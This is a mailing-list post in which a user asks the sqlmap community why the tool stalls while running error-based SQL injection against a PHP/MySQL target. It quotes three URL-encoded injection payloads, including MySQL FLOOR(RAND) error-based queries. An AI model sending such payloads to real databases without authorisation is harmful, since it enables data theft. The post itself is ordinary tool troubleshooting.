A php/mysql system has a simple, integer SQL injection. The only working
technique is error based (verified and successfully exploited manually).
Any other techniques cause the server to not reply, jus stall. When using
sqlmap with --dbms=mysql and --technique=E, sqlmap successfully does 3
requests, but does something different on the fourth which causes the
server to time out and never reply. The successful requests are:
* id=1%22%27%29%5B.%27%29%28%5D%5B
*
id=1%29%20AND%20%28SELECT%201561%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a70736c3a%2C%28SELECT%20%28CASE%20WHEN%20%281561%3D1561%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7a6d683a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%286864%3D6864
*
id=1%20AND%20%28SELECT%201561%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a70736c3a%2C%28SELECT%20%28CASE%20WHEN%20%281561%3D1561%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7a6d683a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29
The fourth request, which I sadly don't have saved, fails. Casual glance
suggested it was different from these and was not error based (I might be
wrong).
--
Konrads Smelkovs
Applied IT sorcery.
------------------------------------------------------------------------------
Precog is a next-generation analytics platform capable of advanced
analytics on semi-structured data. The platform includes APIs for building
apps and a phenomenal toolset for data science. Developers can use
our toolset for easy data analysis & visualization. Get a free account!
http://www2.precog.com/precogplatform/slashdotnewsletter
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
